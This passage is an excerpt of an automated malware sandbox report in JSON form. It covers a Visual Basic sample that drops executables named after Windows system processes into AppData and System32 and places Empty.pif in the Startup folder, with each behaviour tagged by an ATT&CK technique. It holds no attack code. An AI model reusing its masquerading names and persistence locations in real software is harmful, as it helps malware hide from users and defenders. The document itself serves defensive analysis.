00000000-00003524)\n Spawned process \"D3_08.exe\" (UID: 00000000-00003572)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004420)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003476)\n Spawned process \"D3_08.exe\" (UID: 00000000-00001748)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00002684)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00002656)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004116)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00001856)\n Spawned process \"D3_08.exe\" (UID: 00000000-00001176)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003904)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003548)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003816)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004112)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"services.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"services.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"D3_08.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"D3_08.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"shell.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"shell.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"D3_08.exe.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"D3_08.exe.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Data HAPUBWS.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"Data HAPUBWS.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"Empty.pif\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"Empty.pif\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"New Folder.exe\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"New Folder.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"CSRSS.EXE.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"CSRSS.EXE.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"D3_08.EXE.67E3CEFD.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"D3_08.EXE.67E3CEFD.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SERVICES.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"SERVICES.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"D3_08.EXE.67E3CC76.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"D3_08.EXE.67E3CC76.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"SMSS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"SMSS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"LSASS.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"LSASS.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IEXPLORER.EXE.67E3D138.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IEXPLORER.EXE.67E3D138.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"MrD3_08.scr\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"MrD3_08.scr\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"IEXPLORER.EXE.67E3CC79.bin\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"IEXPLORER.EXE.67E3CC79.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"WINLOGON.EXE\" was detected as \"Microsoft Visual Basic\" and name: \"Compiler\"\n \"WINLOGON.EXE\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47\" has an executable section named \".text\"\n \"services.exe\" has an executable section named \".text\"\n \"D3_08.exe\" has an executable section named \".text\"\n \"shell.exe\" has an executable section named \".text\"\n \"D3_08.exe.bin\" has an executable section named \".text\"\n \"Data HAPUBWS.exe\" has an executable section named \".text\"\n \"Empty.pif\" has an executable section named \".text\"\n \"New Folder.exe\" has an executable section named \".text\"\n \"CSRSS.EXE.bin\" has an executable section named \".text\"\n \"D3_08.EXE.67E3CEFD.bin\" has an executable section named \".text\"\n \"SERVICES.EXE\" has an executable section named \".text\"\n \"D3_08.EXE.67E3CC76.bin\" has an executable section named \".text\"\n \"SMSS.EXE\" has an executable section named \".text\"\n \"LSASS.EXE\" has an executable section named \".text\"\n \"IEXPLORER.EXE.67E3D138.bin\" has an executable section named \".text\"\n \"MrD3_08.scr\" has an executable section named \".text\"\n \"IEXPLORER.EXE.67E3CC79.bin\" has an executable section named \".text\"\n \"WINLOGON.EXE\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47\" has an writable section named \".data\"\n \"services.exe\" has an writable section named \".data\"\n \"D3_08.exe\" has an writable section named \".data\"\n \"shell.exe\" has an writable section named \".data\"\n \"D3_08.exe.bin\" has an writable section named \".data\"\n \"Data HAPUBWS.exe\" has an writable section named \".data\"\n \"Empty.pif\" has an writable section named \".data\"\n \"New Folder.exe\" has an writable section named \".data\"\n \"CSRSS.EXE.bin\" has an writable section named \".data\"\n \"D3_08.EXE.67E3CEFD.bin\" has an writable section named \".data\"\n \"SERVICES.EXE\" has an writable section named \".data\"\n \"D3_08.EXE.67E3CC76.bin\" has an writable section named \".data\"\n \"SMSS.EXE\" has an writable section named \".data\"\n \"LSASS.EXE\" has an writable section named \".data\"\n \"IEXPLORER.EXE.67E3D138.bin\" has an writable section named \".data\"\n \"MrD3_08.scr\" has an writable section named \".data\"\n \"IEXPLORER.EXE.67E3CC79.bin\" has an writable section named \".data\"\n \"WINLOGON.EXE\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"SERVICES.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00003904]\n Dropped file: \"SMSS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00003904]\n Dropped file: \"LSASS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00003904]\n Dropped file: \"WINLOGON.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00003904]\n Dropped file: \"CSRSS.EXE\" - Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00003904]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to access non-existent file \"C:\\MSVBVM60.DLL\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to access non-existent file \"C:\\SXS.DLL\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to access non-existent file \"C:\\CRYPTSP.dll\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to access non-existent file \"C:\\dwmapi.dll\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\LSASS.exe\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SMSS.EXE\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to access non-existent file \"C:\\Windows\\D3_08.exe\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to access non-existent file \"C:\\D3_08.exe\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to access non-existent file \"C:\\Windows\\system32\\shell.exe\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local.exe\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" reads file \"c:\\users\\desktop.ini\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" reads file \"c:\\users\\%osuser%\\documents\\desktop.ini\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" reads file \"c:\\506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to touch file \"C:\\MSVBVM60.DLL\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to touch file \"C:\\Windows\\system32\\MSVBVM60.DLL\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to touch file \"C:\\Windows\\system32\\rpcss.dll\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to touch file \"C:\\CRYPTBASE.dll\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to touch file \"C:\\Windows\\system32\\CRYPTBASE.dll\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to touch file \"\\Device\\KsecDD\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to touch file \"C:\\Windows\\system32\\uxtheme.dll\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to touch file \"C:\\506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe.cfg\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to touch file \"C:\\SXS.DLL\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to touch file \"C:\\Windows\\system32\\SXS.DLL\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to touch file \"C:\\Windows\\system32\\c_932.nls\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to touch file \"C:\\Windows\\system32\\c_949.nls\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to touch file \"C:\\Windows\\system32\\c_950.nls\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to touch file \"C:\\Windows\\system32\\c_936.nls\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to touch file \"C:\\CRYPTSP.dll\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to touch file \"C:\\Windows\\system32\\CRYPTSP.dll\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to touch file \"C:\\Windows\\system32\\rsaenh.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to access non-existent file \"C:\\506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe.cfg\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to access non-existent file \"C:\\506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe.Local\\\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" trying to access non-existent file \"C:\\506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.pif\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" connecting to \"\\ThemeApiPort\"\n \"D3_08.exe\" connecting to \"\\ThemeApiPort\"\n \"IExplorer.exe\" connecting to \"\\ThemeApiPort\"\n \"CSRSS.EXE\" connecting to \"\\ThemeApiPort\"\n \"SMSS.EXE\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" writes file \"c:\\share\\data hapubws.exe\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" writes file \"c:\\users\\hapubws\\appdata\\local\\smss.exe\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" writes file \"c:\\windows\\d3_08.exe\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" writes file \"c:\\d3_08.exe\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" writes file \"c:\\windows\\system32\\shell.exe\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" writes file \"c:\\windows\\system32\\mrd3_08.scr\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" writes file \"c:\\windows\\system32\\iexplorer.exe\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" writes file \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\empty.pif\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\winlogon.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" touched file \"C:\\Windows\\D3_08.exe\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" touched file \"C:\\Windows\\System32\\shell.exe\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" touched file \"C:\\Windows\\System32\\MrD3_08.scr\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" touched file \"C:\\Windows\\System32\\IExplorer.exe\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" touched file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\LSASS.EXE\"\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\LSASS.EXE\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-235", "type": 6, "relevance": 1, "name": "Queries basic information of the specified process", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" queries basic process information of the \"C:\\share\\Data HAPUBWS.exe\" (UID: 5912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\smss.exe\" (UID: 5912)\n \"D3_08.exe\" queries basic process information of the \"C:\\share\\Data HAPUBWS.exe\" (UID: 5904)\n \"D3_08.exe\" queries basic process information of the \"C:\\share\\D3_08\\New Folder.exe\" (UID: 5904)\n \"IExplorer.exe\" queries basic process information of the \"C:\\share\" (UID: 4200)\n \"IExplorer.exe\" queries basic process information of the \"C:\\PuRn4m4.txt\" (UID: 4200)\n \"WINLOGON.EXE\" queries basic process information of the \"C:\\share\" (UID: 6068)\n \"WINLOGON.EXE\" queries basic process information of the \"C:\\Windows\\System32\\tzres.dll\" (UID: 6068)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"services.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\D3_08.exe]- [targetUID: 00000000-00003904]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\shell.exe]- [targetUID: 00000000-00003904]\n \"D3_08.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif]- [targetUID: 00000000-00003904]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"CSRSS.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.EXE.67E3CEFD.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00003904]\n \"D3_08.EXE.67E3CC76.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00003904]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00003904]\n \"IEXPLORER.EXE.67E3D138.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"MrD3_08.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\MrD3_08.scr]- [targetUID: 00000000-00003904]\n \"IEXPLORER.EXE.67E3CC79.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00003904]\n \"PuRn4m4.txt\" has type \"ASCII text with CRLF line terminators\"- Location: [C:\\PuRn4m4.txt]- [targetUID: 00000000-00003904]\n \"desktop.ini\" has type \"Windows desktop.ini\"- [targetUID: 00000000-00005904]\n \"lsass.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00003904]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\IExplorer.exe]- [targetUID: 00000000-00003904]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\D3_08.exe]- [targetUID: 00000000-00003904]\n \"smss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00003904]\n \"csrss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00003904]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00003904]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00003904]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00003904]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: 00000000-00003904]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00003904]\n \"D3_08.EXE.67E3D133.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00004200)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00004200)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00004200)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00006100)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00006100)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00006100)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00006036)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00006036)\n \"IExplorer.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00006036)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00002312)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 